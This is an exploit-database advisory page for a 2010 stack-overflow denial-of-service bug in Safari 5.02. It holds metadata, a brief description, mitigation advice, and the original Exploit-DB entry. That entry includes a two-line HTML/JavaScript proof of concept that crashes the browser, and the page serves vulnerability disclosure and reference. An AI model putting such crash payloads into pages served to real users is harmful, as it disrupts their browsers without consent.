header-logo
Suggest Exploit
vendor:
Safari
by:
Alessio Dalla Piazza
7,8
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: Safari
Affected Version From: 5.02
Affected Version To: 5.02
Patch Exists: YES
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 EN
2010

Safari 5.02 stack overflow [dos]

A stack overflow vulnerability exists in Safari 5.02 which can be exploited to cause a denial of service. The vulnerability is caused due to a boundary error when handling a specially crafted HTML page. This can be exploited to cause a stack-based buffer overflow by e.g. embedding a long string in the document.body.innerHTML property.

Mitigation:

Upgrade to the latest version of Safari.
Source

Exploit-DB raw data:

# Exploit Title: Safari 5.02 stack overflow [dos]
# Date:10/11/2010
# Author: clshack
# Software Link: http://www.apple.com/it/safari/download/
# Version:5.02
# Tested on: windows xp sp3 en
# CVE :

Browser crash:> 
<script>document.write('a')</script>
<script>document.write(document.body.innerHTML)</script>

--
> Alessio Dalla Piazza (Personal Blog: http://www.clshack.it)

Navigation

Suggest Exploit

Services By CQR